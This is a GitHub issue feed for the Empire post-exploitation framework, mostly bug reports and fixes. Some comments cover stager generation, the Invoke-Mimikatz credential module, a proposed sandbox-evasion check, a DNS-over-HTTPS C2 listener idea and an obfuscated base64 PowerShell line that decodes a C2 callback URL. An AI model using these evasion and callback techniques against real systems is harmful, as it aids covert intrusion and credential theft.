then i pull using the command from previous issue i posted here https://github.com/BC-SECURITY/Empire/issues/30

git pull
./setup/reset.sh

[2020-01-03 02:43] rossiV1 commented on #54
on the side note,
the empire server has been online for almost a week, and my previous agents did not manage to connect back and i deleted those stale agents, restarted empire, and i use hta to connect back to empire.

[2020-01-03 03:09] Cx01N commented on #54
@rossiV1  We suggest that you redownload the master branch since the official release of 3.0.1 was earlier this week and the 3.0-bug-fixes branch is unstable. I am currently running the most recent release on Ubuntu 19.10 and tried your listener settings, but could not reproduce your issue.

[2020-01-03 03:11] rossiV1 commented on #54
ok noted. let me try first.

thank you for the fast responses

[2020-01-03 07:48] rossiV1 commented on #54
i have setup fresh install of empire. and currently had problem of this

  File "/usr/lib/python3/dist-packages/flask/app.py", line 1982, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/lib/python3/dist-packages/flask/app.py", line 1614, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/lib/python3/dist-packages/flask/app.py", line 1517, in handle_us

[2020-01-03 08:09] rossiV1 commented on #54
the sysinfo issue has been resolve.

only the issue above arise as i use same setup for listener.

[2020-01-03 08:16] LaZyDK commented on #48
I am using the powershell agent as shown here.
![Skærmbillede 2020-01-03 kl  09 11 45](https://user-images.githubusercontent.com/9623973/71713318-83db6b80-2e09-11ea-889c-ebdb7e4bb943.png)

Also I am using docker compose. I have tried both latest and 3.0.1, and both are freshly pulled.
![Skærmbillede 2020-01-03 kl  09 14 37](https://user-images.githubusercontent.com/9623973/71713335-98b7ff00-2e09-1

[2020-01-03 09:53] Z6543 opened #55 "Upload command - binary file type issue"
## Empire Version
3.0.1

## OS Information (Linux flavor, Python version)
Kali, Python 3.7.5

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

Uploading binary files should result in the same file being uploaded. Text file uploading works perfectly. Binary file upload removes some bytes from the file, thus r

[2020-01-03 14:36] Cx01N commented on #54
@rossiV1 Im going to close this issue out since sysinfo is working. Can you please open up a new issue for your current agent problem? It will make tracking for us a bit easier. Thanks.

[2020-01-03 14:36] #54 closed

[2020-01-03 15:45] vinnybod commented on #48
Hey, so I haven't had time to test this theory just yet, but I believe the issue here is related to the mounted volume.The giveaway is that we made some changes in 3.0.1 to the line endings on some of those print statements that don't appear in your screenshots.

If you run `empire:latest` or `empire:v3.0.1` without the mounted volumes, my theory is that the sysinfo bug will go away. If that is th

[2020-01-04 08:45] rossiV1 opened #56 "listener and agent on reset or overwrite"
## Empire Version
3.0.1 BC-Security Fork

## OS Information (Linux flavor, Python version)
Ubuntu 18.04, Python 3.6.9

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Fresh install or overwrite of new version of empire will generate error below if same setup of listener is configured

## Screenshot of error,

[2020-01-04 09:18] rossiV1 opened #57 "launcher_lnk"
## Empire Version
3.0.1 BC-Security Fork

## OS Information (Linux flavor, Python version)
Ubuntu 18.04, Python 3.6.9

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
cannot produce lnk stager file.

## Screenshot of error, embedded text output, or Pastebin link to the error
![Screenshot from 2020-01-04 17-1

[2020-01-04 09:33] rossiV1 commented on #57
found another error same as above at windows/dll
![Screenshot from 2020-01-04 17-33-12](https://user-images.githubusercontent.com/37831634/71763564-54675480-2f18-11ea-9b03-c117ccc9c7bc.png)

[2020-01-04 16:39] Hubbl3 commented on #56
@rossiV1  it is a bug. There is an issue in the handling of "unknown" agents (I.e agents that belong to a different empire server.)

[2020-01-04 17:39] vinnybod commented on #48
@LaZyDK I tested my theory and this is the case for me. I would recommend using different volumes for different versions of empire for the time being.

[2020-01-05 07:02] Cx01N commented on #53
Closing due to not being directly an Empire issue.

[2020-01-05 07:02] #53 closed

[2020-01-05 07:03] Cx01N commented on #52
Same issue as #51.

[2020-01-05 07:03] #52 closed

[2020-01-06 02:40] Hubbl3 opened #59 "Invoke-Shellcode Issues and Powersploit DIscussion"
I have fixed the typo in Invoke-Shellcode that broke the use of custom shellcode but the automated support for reverse_http and reverse_https payloads appear to no longer longer work. Powersploit dropped support for this in Invoke-Shellcode in 2015 with the release of V3.0.0. I have not isolated the exact reason why this no longer works but suspect it has to do with changes in the way metasploit s

[2020-01-07 05:51] 0xskywalker opened #60 "'Exception': a bytes-like object is required"
## Empire Version
3.0 BC-Security Fork

## OS Information (Linux flavor, Python version)

OS: Ubuntu 18.04 bionic
Python 3.6.9

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

when trying to generate a multi/macro, the following failure is encountered

(Empire: stager/multi/macro) > execute
[!] Exception: a

[2020-01-07 10:01] Sa1riil commented on #60
Hello, i confirm this for windows/dll; windows/shell;

OS Information: Linux parrot 5.4.0-1parrot1-amd64 #1 SMP Parrot 5.4.6-1parrot1 (2019-12-30) x86_64 GNU/Linux
Python 3.7.5

[2020-01-08 03:04] Hubbl3 commented on #56
@rossiV1 I have fixed the error but an old agent will still cause continuous checkins as the server and agent can't properly talk to each other since they are using different keys.

[2020-01-08 03:04] #56 closed

[2020-01-08 03:49] Hubbl3 commented on #60
@0xskywalker I just pushed a commit to the 3.0.1-bug-fixes branch that corrects the problem.

@Sa1riil I tried those stagers with the update as well and I didn't see any errors

[2020-01-08 04:28] #59 closed

[2020-01-08 06:52] 0xskywalker commented on #60
@Hubbl3 i just confirmed your fix, it worked. Thanks!

[2020-01-08 07:15] #60 closed

[2020-01-08 11:01] Sa1riil opened #63 "Add an option to drop an interactive shell."
I was thinking that having the following features, will be great:
      1. An option to drop an interactive shell.
      2. An option to make use of the metasploit's meterpreter: in this case we will can use directly from empire all metasploit/meterpreter features instead of having a separate session/terminal for metasploit.

[2020-01-08 12:43] #48 closed

[2020-01-08 12:44] #57 closed

[2020-01-08 16:45] vinnybod commented on #60
This was also released yesterday as part of 3.0.2

[2020-01-09 13:21] Hubbl3 commented on #63
@Sa1riil  what do you mean drop an interactive shell? You already have access to any shell commands by using shell <command> when interacting with an agent.

[2020-01-09 15:55] Sa1riil commented on #63
Hello Hubll3,
Shell commands works fine but there are times when you want to execute an entire script file through copy pasting it in the terminal.
I observed the shell command can execute only basic commands instead of complex scripts.
There are also times when I am using both single and double quote, which will break my script if I try to use it through the empire's "shell" option.
In case it ma

[2020-01-09 16:04] Hubbl3 commented on #63
@Sa1riil that's what Empire's modules are for. They are simply loading large scripts into memory. There are template files provided that describe how to do this.

Invoke-Mimikatz for example is just a very large .ps1 stored in ./Empire/data/module_source/credentials

Does that achieve what you are looking or am I misunderstanding?

[2020-01-09 16:15] Sa1riil commented on #63
Yes this was what i mean, then there is no need to have an interactive shell.
About an option to interconnect empire to all modules from metasploit through a meterpreter session, does it is possible without needing a separate session of meterpreter in other terminal?

[2020-01-09 17:31] Davewarrington opened #65 "creds command produces exception"
## Empire Version Latest 3.0.2

## OS Information (Linux flavor, Python version) Kali 2019.4

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

Issuing Creds Command produces "[!] Exception: 'str' object has no attribute 'decode'"

## Screenshot of error, embedded text output, or Pastebin link to the error

#

[2020-01-11 04:06] Hubbl3 commented on #65
@Davewarrington  can you give me some more context? were you interacting with an agent or was it from a specific menu? had you run a module such as invoke-mimikatz prior to the error?

I have been able to reproduce this

[2020-01-11 12:05] Davewarrington commented on #65
hey @Hubbl3 .

If i load empire, from scratch, nothing configured, and run creds . I receive the error.
If i try to add creds it's the same issue.
creds display seems to work ok. however, as expected it's blank.

Attached SS.

![image](https://user-images.githubusercontent.com/16097102/72203955-60986800-346a-11ea-9859-fe81fcb25f7f.png)

![image](https://user-images.githubusercontent.com/16097102/7

[2020-01-11 22:19] vinnybod commented on #65
@Hubbl3 I can verify after attempting to add a credential, I get an error on the `creds` command in both python2 and python3

[2020-01-12 13:59] Hubbl3 commented on #65
@Davewarrington I pushed a commit to 3.0.2-bug-fixes that addresses the problem let me know if that doesn't fix it for you

[2020-01-12 20:08] Davewarrington commented on #65
Did a clean pull on the 3.02 and install .. first run ..

Traceback (most recent call last):
  File "empire", line 1426, in <module>
    main = empire.MainMenu(args=args)
  File "/opt/Empire/lib/common/empire.py", line 114, in __init__
    self.listeners = listeners.Listeners(self, args=args)
  File "/opt/Empire/lib/common/listeners.py", line 43, in __init__
    self.load_listeners()
  File "/opt/

[2020-01-12 20:40] Hubbl3 commented on #65
@Davewarrington it looks like something went wrong when we did a merge earlier today. I am trying to figure out what happened

[2020-01-12 21:01] Hubbl3 commented on #65
@Davewarrington we missed a conflict clean up when merging. If you re-pull Empire it should be working now

[2020-01-13 05:14] #65 closed

[2020-01-13 05:14] #51 closed

[2020-01-13 05:15] #49 closed

[2020-01-13 09:51] rossiV1 opened #69 "fresh install, cannot run ./empire or ./setup/reset.sh"
## Empire Version
3.0 (yet to run cause of error)

## OS Information (Linux flavor, Python version)
Ubuntu 18.04, python 3.6.9

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

upon running ./empire empire server cannot start due to error.
error is as

when trying to reset using ./setup/reset.sh did not find

[2020-01-13 13:09] Hubbl3 commented on #69
@rossiV1  are you using the docker install or just a git clone? and was this a new install of Ubuntu or an old one?

I just tried doing a new install on a Kali box and it worked fine. I will test ubuntu later today

[2020-01-13 15:14] rossiV1 commented on #69
i am just using the git clone. and it is a fresh install of Ubuntu 18.04.

[2020-01-13 15:25] vinnybod commented on #69
I just attempted reproducing on `ubuntu:18.04` docker image. After running `apt-get update && apt-get install sudo lsb-release wget`, I ran `install.sh` and was able to run empire using `./empire` I also ran the reset script with no issue.

It seems like your machine might just be missing the future module. I common fix for `No module named builtins` is to run a `pip install future`.

I also recom

[2020-01-13 15:34] rossiV1 commented on #69
actually i have encounter this problem twice. both fresh install of ubuntu 18.04.
and the first time it happened, i manage to resolve it, i think it was related to future module. but i still cannot start ./empire at the first time. but manage to run reset.sh.

after i read @vinnybod post above, i tried running pip install future, pip3 install future, apt-get install python3-future. then i reran ./

[2020-01-13 15:38] vinnybod commented on #69
`future` isn't currently in the `requirements.txt`, somehow it hasn't been needed for our tested use cases. We should see about getting that added then.

[2020-01-13 15:50] rossiV1 commented on #69
on the other hand, in include other requirements that i need to install before successfully running ./empire

    ./empire
    pip3 install flask
    ./empire
    pip3 install iptools
    ./empire
    pip3 install simplejson
    pip3 install setuptools
    pip3 install simplejson
    ./empire
    pip3 install pydispatch
    ./empire
    apt-get -y install python3-pydispatch
    ./empire
    pip3 i

[2020-01-13 16:25] vinnybod commented on #69
Sorry, I'm trying to understand the codeblock you posted. you manually ran that apt-get and all those pip install commands?

Those python libraries are all in the requirements.txt and should be installed by the install script [here](https://github.com/BC-SECURITY/Empire/blob/master/setup/install.sh#L167)

[2020-01-13 16:27] rossiV1 commented on #69
yeah, i manually ran those codeblock as when i run ./empire it shows no module of above

[2020-01-13 16:45] vinnybod commented on #69
Okay, I only tried this out in an ubuntu docker container, so when I have a chance I'll get a proper VM spun up and test it out.

In the meantime, if you have the output of your initial install.sh and post it at a gist here on github, that might be useful to investigate. It sounds to me like your initial install may have failed and quit short of running pip and apt-get.

[2020-01-14 01:59] rossiV1 commented on #69
sorry i did not save the output of the initial install.sh. if i work on a fresh install again i will post it.

[2020-01-15 06:20] complana opened #71 "Which version of Python 3?"
Would be great to know what version of Python3 was used by the dev to test the latest release? Getting different errors on different python version when creating stagers.

Thanks!

[2020-01-15 13:25] Hubbl3 commented on #71
@complana can you provide some more details. Which stager module are you having issues with and what errors are you getting.

We test with 3.7 mostly but it should be broadly compatible across 3.x

[2020-01-16 01:44] complana commented on #71
Many thanks.

For example: I tested initially with 3.8.1. But the staging process threw some error (HMAC Verification failed). Apparently for 3.8, the digestmod parameter for hmac.new() function is **required** (previously optional). Changing all occurrences of hmac.new() to include the digestmod parameter fixed it.

[2020-01-16 02:06] complana commented on #71
I can create a PR if that helps

[2020-01-16 02:37] Hubbl3 commented on #71
@complana

It would be great if you could submit a PR. However, we are striving to maintain 2.7 backwards compatibility so if that hmac.new() change isn't supported by the futures module we may just have to note that Empire is not 3.8 compatible.

[2020-01-16 02:38] complana commented on #71
Hi @Hubbl3 I have created a PR in dev. And tested this with 3.8.1 and 2.7.17. Seems to be working fine

[2020-01-16 04:14] #69 closed

[2020-01-17 06:02] Hubbl3 commented on #55
I just pushed a fixed to the upload_fix branch. The fix will be merged into master at the next release. Closing the issue for now

[2020-01-17 06:02] #55 closed

[2020-01-17 09:10] complana opened #73 "stager windows/shellcode is broken"
## Empire Version
3.0.4

## OS Information (Linux flavor, Python version)
Ubuntu 16.0.4

The output from windows/shellcode stager seems to be malfunctioned. I compared the .bin file generated by original empire and empire 3.0.4 and noticed that the headers output are different.

Anyone also experiencing this?

[2020-01-17 23:52] Invoke-Mimikatz commented on #63
@Sa1riil You can run entire scripts in Empire by doing the following:

`scriptimport ~/Invoke-Whatever.ps1` to load a Powershell script into your agent.
`scriptcmd Invoke-Whatever -Flag` to run Powershell functions previously imported.

It would be cool to have an option to drop into a `shell` like meterpreter, but Empire can run shell commands already, and has methods of running larger scripts if

[2020-01-18 05:27] rtaylor777 opened #74 "TypeError: cannot unpack non-iterable NoneType object"
## Empire Version
Just installed
git clone https://github.com/BC-SECURITY/Empire.git

## OS Information (Linux flavor, Python version)
root@kali:/opt/Empire# cat /etc/os-release
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2019.4"
VERSION_ID="2019.4"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https:/

[2020-01-18 06:23] pbssubhash commented on #74
Same issue, Just installed.

Here are the details.

#### OS Information:
[code]

Python Version:
[code]
Uname:
[code]

Full Error:
[code]

Will be more than happy to provide any additional details.

[2020-01-18 14:38] Hubbl3 commented on #74
@pbssubhash and @rtaylor777. Sometimes the database gets messed up during the initial install just run reset.sh and it should work fine.

[2020-01-18 14:46] pbssubhash commented on #74
Thanks. Worked like a charm.

[2020-01-18 16:00] secfb commented on #74
[code]
Execute
[code]

[2020-01-19 14:59] #74 closed

[2020-01-19 19:21] Hubbl3 commented on #73
@complana  are they just different or the shellcode is invalid?

[2020-01-20 11:19] Sa1riil opened #77 "Multiple possible bugs. Exception: string argument without an encoding"
## Empire Version
 [Version] 3.0.4 BC-Security Fork | [Web] https://github.com/BC-SECURITY/Empire

## OS Information (Linux flavor, Python version)
Linux parrot 5.4.0-2parrot1-amd64 #1 SMP Parrot 5.4.8-2parrot1 (2020-01-12) x86_64 GNU/Linux

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
I have obtained a r

[2020-01-20 11:29] Sa1riil commented on #77
Other error is when trying to execute the sysinfo command from the agent menu:
`(Empire: powershell/privesc/sherlock) > back
(Empire: HB3ZNDWP) > sysinfo
[*] Tasked HB3ZNDWP to run TASK_SYSINFO
[*] Agent HB3ZNDWP tasked with task ID 3
(Empire: HB3ZNDWP) > [!] Invalid sysinfo response from HB3ZNDWP

`

[2020-01-20 16:46] Cx01N commented on #77
@Sa1riil Invoke-allchecks should be working again on the dev branch since it was addressed in #64. I recommend checking it out to make sure it is working for you.

As for the issues with `sysinfo `and `ls`, what version of windows are you running and updates installed? There may have been an update released that changed some of the ways Powershell is handled. I was testing this out on the most rec

[2020-01-20 17:31] Sa1riil commented on #77
Hi Cx01N,
The target is a machine from a CTF, as soon as i get root on it, i will check it because of the moment i can not for the moment.

[2020-01-20 17:45] Sa1riil commented on #63
Thank you for clarifying it to me.
So i think having two shells: one for meterpreter, other for empire can resolve all i said. If you consider it is to much to work for it, you can close it. I will try to think at a method to made them interoperable and in case it works, i will forward it to you to add at the main branch if you consider it is good.

[2020-01-20 18:09] Hubbl3 commented on #77
@Sa1riil If this is a CTF machine there is no way for us to validate the issues you are encountering as coming from Empire.

It's entirely possible that there is some setting enabled that is causing the issue or even intentionally broken services on the machine.

[2020-01-20 20:25] Sa1riil commented on #77
I have understood, if it is oki to let me 2 more days to obtain additional data otherwise i will close it as resolved.
Thank you for all your effort.

[2020-01-21 03:47] #71 closed

[2020-01-21 03:48] Hubbl3 commented on #73
@complana the bug has been fixed in the latest release we are pushing 3.0.5

[2020-01-21 03:48] #73 closed

[2020-01-22 10:24] #63 closed

[2020-01-22 23:09] benichmt1 opened #81 "OSX Catalina - ModuleNotFoundError: No module named 'future'"
## Empire Version

3.0.5 (latest)

## OS Information (Linux flavor, Python version)

Host OS: Ubuntu 18.04, Python 3.6.9
Victim OS: OSX Catalina, Python 3.7.3

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

- Empire installed using `install.sh`. Pip and Pip3 both exist on the server. No errors during insta

[2020-01-23 09:29] pawp81 opened #82 "Exception: unsupported format string passed to NoneType.__format__ in Agents"
## Empire Version
3.0.1

## OS Information (Linux flavor, Python version)
Kali Linux

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
After opening "agents" incomplete list of agents is presented and the end of the list there is following error:
[!] Exception: unsupported format string passed to NoneType.__f

[2020-01-23 14:23] Cx01N commented on #82
@pawp81 It seems that you are running an older version of Empire. Can you update to version 3.0.5 and see if the problem still persists?

[2020-01-23 15:41] pawp81 commented on #82
@Cx01N thank you. Would you share steps how to update Empire? I don't see it documented.

[2020-01-23 15:44] Hubbl3 commented on #82
@pawp81 you just have to do a git pull from the Empire folder and then restart Empire

[2020-01-24 03:07] rossiV1 opened #83 "way to update from old version??"
## Empire Version
currently 3.0.3 BC-Security Fork

## OS Information (Linux flavor, Python version)
Ubuntu 18.04, python 3.6.9

## Any additional information
Just a question, is there any ways to upgrade the maintain version of empire to latest version without going through a new install?

[2020-01-24 06:00] vinnybod commented on #81
I tested this on Catalina and was able to successful connect the agent with an http listener and the osx/launcher stager:
Remove the future/builtin imports in [data/agent/stagers/http.py](https://github.com/BC-SECURITY/Empire/blob/master/data/agent/stagers/http.py) and [data/agent/agent.py](https://github.com/BC-SECURITY/Empire/blob/master/data/agent/agent.py). Since the stager seems to target pyt

[2020-01-24 06:02] vinnybod commented on #83
you should be able to `git pull origin master` and run the updated code. However, occasionally there are changes that require you to run the reset script.

[2020-01-24 06:27] rossiV1 commented on #83
the changelog will tell if we need to run the reset script or not right?

and can the `git pull origin master` or the update script be put on the main page? as some other tools has `--upgrade` such as sqlmap. this will help other users to upgrade their empire version as well

[2020-01-24 11:25] jorgeorchilles opened #85 "set StagingKey requires 32 characters - unicode-objects must be encoded before hashing"
## Empire Version
3.0.5

## OS Information (Linux flavor, Python version)
Linux slingshot 4.15.0-72-generic #81-Ubuntu SMP Tue Nov 26 12:20:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
use listener http
set StagingKey thisisatest
[!] Error in setting listener op

[2020-01-24 16:36] benichmt1 commented on #81
Removing all the future, builtin, standard_library, and past references was able to successfully stage an agent for me, thanks.

Because the intended purpose is creating a universal implant, I don't think that's the best idea.

Interesting note here, it seems that scripting languages are potentially going to be deprecated in future versions of OSX...
https://developer.apple.com/documentation/xcode

[2020-01-25 00:28] hypnoticpattern opened #86 "Broken osx/application stager after the changes to launcherBase"
## Empire Version
3.0.5

## OS Information (Linux flavor, Python version)
Server: Ubuntu 18.04.3 LTS (Bionic Beaver)
   |=> Python 3.6.9
Agent: Run on OSX Catalina 10.15.2
   |=> Python 2.7.16 (the one used by the stager)
   |=> Python 2.7.17 (shipped with MacOS)
   |=> Python 3.7.3 (I manually installed it)

## Expected behavior and description of the error, including any actions taken immediatel

[2020-01-25 04:10] Cx01N commented on #83
@rossiV1 At the moment we do not have an upgrade script since we are relying on the built-in functionality of git.

[2020-01-25 04:11] Cx01N commented on #77
Closing for now since the issue appears to be resolved. Please feel free to reopen if you need to.

[2020-01-25 04:11] #77 closed

[2020-01-25 19:18] vinnybod commented on #86
I can verify I have the same issue. The binary launcher file references `/System/Library/Frameworks/Python.framework/Versions/2.7/Python`. I am unsure how those files were created to begin with, but I think having one that targets 2.7 and another to target 3.x might be the solution, what do you think?

I floated a similar idea here https://github.com/BC-SECURITY/Empire/issues/81#issuecomment-57800

[2020-01-25 20:46] Invoke-Mimikatz opened #87 "Listeners occasionally get hung up and stop working"
## Empire Version
BC-Security Empire 3.0.5 --branch=dev

## OS Information (Linux flavor, Python version)
Kali GNU/Linux Rolling VERSION 2019.2
Python 3.7.5

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Http listeners occasionally stop working. I am not sure the exact cause, but suspect some infinite loop

[2020-01-25 21:18] vinnybod opened #88 "session_key in agents api causing failed request"
## Empire Version
3.0.5

## OS Information (Linux flavor, Python version)
Empire Docker build

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
when requesting agents from `/api/agents`, the response does not contain the list of agents, instead it contains an error.

## Screenshot of error, embedded text outp

[2020-01-27 03:40] hypnoticpattern commented on #86
It would be great to have the templates source code, either creating new ones or retrieving the source for the the ones embedded in the project, since it can be useful to make sure nothing funky is happening when you run the binary.

To keep things simple I would stick with the current version of the app because Python 2.7 ships with MacOS and we can rely on the fact that it is on all MacOS system

[2020-01-27 05:05] Cx01N commented on #87
@Invoke-Mimikatz Can you provide the listeners/stagers and the conditions for us to try to recreate it?

[2020-01-30 01:24] Invoke-Mimikatz commented on #87
I have been trying to replicate this again and it's proving harder than I thought it would be.  I can tell you that often times when I leave Empire agents alive for long periods of time (days or weeks), I sometimes come back to find all agents are dead. Trying to create new agents also fails. When this happens, I exit Empire and have to `^C^C^C^C^C^C` to kill the listener, which has become unrespo

[2020-01-30 04:06] #82 closed

[2020-01-30 04:06] #83 closed

[2020-01-30 04:16] Cx01N commented on #86
@hypnoticpattern We have spent some time trying to build either dual launchers or a single launcher to do both 2.7/3.x and the fundamental differences between the two languages have made it a non-trivial task. The way bytes are handled in Python 2 makes communicating with Empire problematic since we are moving to be solely Python 3.X for the server.

I think the ideal situation would be for us to

[2020-01-30 13:28] Invoke-Mimikatz commented on #86
@Cx01N From an operator standpoint, the only place Python 2 compatibility needs to be provided is in the agents. Since Python2 is EOL, I see no reason Empire should support it on the server side. An operator can always update their Empire server to the latest Python release, but Python2 agent compatibility would still matter for Linux/Unix or embedded devices that might still be running legacy Pyt

[2020-01-30 15:45] vinnybod commented on #86
@Invoke-Mimikatz I think we all agree that we would like to have both, it's just not at the top of the priorities.

Here's what we thought about when making this decision
* Most Linux distros at this point have come with python3 for quite some time
* Some of the largest of them are trying to ditch python2.7 completely as soon as possible
* Windows doesn't come with python by default
* MacOS seems

[2020-01-30 19:00] hypnoticpattern commented on #86
@Cx01N I can take a look and see if I can write a Python 2.7 agent that can talk to the Python 3 server. As you mentioned it won't be easy since the agent itself inherits pieces of code that are also used on the server side(e.g. crypto).

At the moment the MacOS app bundle agent is broken since it points to python 2.7 and uses Python 3 code. Would be possible to update the application bundle to po

[2020-01-31 05:09] #88 closed

[2020-01-31 05:10] Cx01N commented on #85
Added fix to v3.0.6. Please feel free to reopen if the issue persists.

[2020-01-31 05:10] #85 closed

[2020-01-31 05:11] Cx01N commented on #81
We removed `import future` from v3.0.6. Please feel free to reopen if you run into a compatibility issue still.

[2020-01-31 05:11] #81 closed

[2020-02-01 02:45] Hubbl3 commented on #87
@Invoke-Mimikatz I have had some times were agents show up stale/dead but are in fact alive and will respond when sent commands but I haven't seen any issues with the listeners hanging

[2020-02-01 20:39] vinnybod opened #92 "AttributeError when executing module via API"
## Empire Version
3.0.6

## OS Information (Linux flavor, Python version)
Debian Buster, Python 3.7.5 (Docker build)

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
When attempting to execute a module on an agent using the API, it doesn't execute and the response comes back with
[code]

## Screenshot of err

[2020-02-01 22:53] #92 closed

[2020-02-02 22:13] xylon-hub opened #95 "Autorun has an exception that makes the stager fail"
## Empire Version
3.6

## OS Information (Linux flavor, Python version)
Linux Debian 10 - Python 3.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

Any module in autorun with a powershell stager causes the stager to fail due to an exception in the code. This means autorun cannot be used in current form

[2020-02-03 02:38] Cx01N commented on #95
I pushed a fix to a branch that should fix the issue. Let us know if this doesn't resolve the problem.
Thanks.

[2020-02-03 02:43] Cx01N commented on #86
@hypnoticpattern Unfortunately, we do not have a lot of documentation on how things were developed in the original Empire. The osx/application launcher is something that was preconfigured and is relatively foreign to us. @vinnybod tends to work on mac a lot more than the rest of us and he may be able to point you in the right direction.

[2020-02-03 04:24] dsturge01 commented on #40
@Cx01N
I was able to get around the issue by editing/adding the following lines to onedrive.py:

staging_key = staging_key.encode('UTF-8')

return RC4IV + encryption.rc4(RC4IV+staging_key, randomized_stager.encode('UTF-8'))

This caused the listener to run without incident, however I do not know if this will mess up encryption/communication with the agent.

---------------------------
Now when I r

[2020-02-04 22:13] hypnoticpattern commented on #86
I had a deeper look at project files and noticed [`macho.m`](https://github.com/BC-SECURITY/Empire/blob/master/data/misc/templateSource/macho.m). That file should be the one used to create the Macho executable that is also included in the app bundle. Empire injects the Python code directly inside the `__cstring` section of the compiled file replacing the hardcoded [base64  string PAYLOAD](https://

[2020-02-05 20:17] Cx01N commented on #86
@hypnoticpattern Thanks! I've been checking it out and tried making some changes. It looks like it is leveraging the python files in /system/Library/Frameworks/Python.frameworks/Versions/2.7/. Since 3.7 isn't getting installed in this directory it is causing some issues. You can change the directory in the machotemplate to /usr/bin/python3 but you'll get that dylib isn't found. Hopefully, that hel

[2020-02-05 21:22] hypnoticpattern commented on #86
@Cx01N The make it work the machotemplate needs Python3.framework shipped with XCode and it's in `/Application/XCode.app/Contents/Developer/Library/Framework`.
At this point I see two options:
1) Use the .app bundle approach and include the Python3.framework there changing the linker option;
2) Use the Macho binary alone and change the dylib path to `/Application/XCode.app/Contents/Developer/Libra

[2020-02-09 04:33] #95 closed

[2020-02-09 04:34] Cx01N commented on #87
@Invoke-Mimikatz  Closing the issue for now. Please feel free to reopen if the problem continues.

[2020-02-09 19:04] xylon-hub commented on #95
It works for me, thanks!

[2020-02-09 19:15] xylon-hub opened #101 "OPSEC Check Module/Options Wanted"
## Empire Version

3.06

I want to add this code to the stager so if wireshark or tcp dump is running then the agent sleeps, common to malware seen in the wild.

#Code written by Brandon Arvanaghi (Check Please)

############################################################

$EvidenceOfSandbox = New-Object System.Collections.ArrayList

$sandboxProcesses =  "tcpview", "wireshark","visual basic", "fi

[2020-02-09 19:24] xylon-hub opened #102 "Dns pver https Listener - Help Wanted"
## Empire Version
3.06

I have managed to write the stager to read google's dns for the hostname but because it then has to reach out to the actual server instead of being forwarded it creates another hello packet instead of it being hidden similar to domain fronting.

############################################################

Possible Update locations: agent.ps1

# update the http comms profil

[2020-02-13 04:52] Invoke-Mimikatz commented on #87
I had an engagement today and had this issue pop up again.  I watched as all agents (on different computers) turned from green to yellow, and then yellow to red all at the exact same time. Pretty weird, right? Not usually what I see during engagements. I realized that most likely my listener had crashed and restarted Empire quickly to hopefully recover the agents before the lost limit expired.  Af

[2020-02-13 05:38] Invoke-Mimikatz commented on #87
pls reopen this issue

[2020-02-14 21:49] Cx01N commented on #86
@hypnoticpattern I am not sure which direction is the best, so I will leave it up to you since I rarely use osx as it is.

[2020-02-23 21:44] Cx01N commented on #87
@Invoke-Mimikatz Are you running the rest API when you see the issue?

[2020-02-23 23:23] Invoke-Mimikatz commented on #87
No, I'm not. Just standard Empire.

[2020-02-24 14:15] ShellCode33 opened #108 "imp package depreciated"
Hey, thanks for keeping up to date that great tool :+1:
According to https://docs.python.org/3/library/imp.html, the imp package (used to preload Empire's modules at runtime) is depreciated since Python 3.4.  It would be great to use importlib instead. It seems the `import_module` function is also available in Python 2 (https://docs.python.org/2/library/importlib.html) so it shouldn't break compat

[2020-03-02 15:33] #44 closed

[2020-03-08 13:06] denevin opened #118 "libicu package not found"
## Empire Version
3.1.0

## OS Information (Linux flavor, Python version)
Kali Linux Rolling

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

when running install.sh the 'libicu57_57.1-6+deb9u2_amd64.deb' file is no longer available from the following URL 'http://ftp.us.debian.org/debian/pool/main/i/icu/lib

[2020-03-08 16:29] vinnybod commented on #118
On the latest Kali, we can install Powershell using `apt update && apt -y install powershell`, so we can simplify that part of the script quite a bit.

This probably also impacts the Deb 10 instructions which points at specific file names as well.

Ref:
https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-linux?view=powershell-7#kali

[2020-03-09 05:17] #118 closed

[2020-03-10 07:13] RedBulletTooling commented on #17
The exact same bug is present in the redirector listener. Having the same issue and the same fix applies.

$ser='$([TeXT.EncODiNg]::UNiCoDE.GEtStRing([CONVerT]::FrOmBasE64StriNG('aAB0AHQAcAA6AC8ALwAxADAALgAwAC4AMwAuADUAOgA4ADAAOAAyAA==')))'

[2020-03-10 13:07] RedBulletTooling opened #122 "Update install.sh for seamless Debian 10.3 installation"
Setup;
Using the latest Debian 10.3 (which includes Python 3.7.3)
Using the latest Empire version

Did some extensive testing and the install.sh script only finishes completely fine on a fresh clean install of Debian 10.3 when the following packages are installed before running the script;

apt install git python3-pip swig libssl-dev sudo

(git, python3-pip and sudo are quite self-evident, but are

[2020-03-12 03:49] Hubbl3 opened #124 "EMpire is terrible"
Your Shit sucks

[2020-03-12 03:50] #124 closed

[2020-03-12 13:26] RedBulletTooling opened #126 "[BUG] RESTful API create listener no name duplication check"
**Empire Version**
- Empire 3.1.1 BC-Security Fork

**OS Information (Linux flavor, Python version)**
- OS: Debian 10.3
- Python: 3.7.3

**Describe the bug**
When creating a listener via the RESTful API with a name of a listener that already exists, it responds with that the listener has been created - whilst that isn't the case because of the name conflict.

**To Reproduce**
Steps to reproduce th

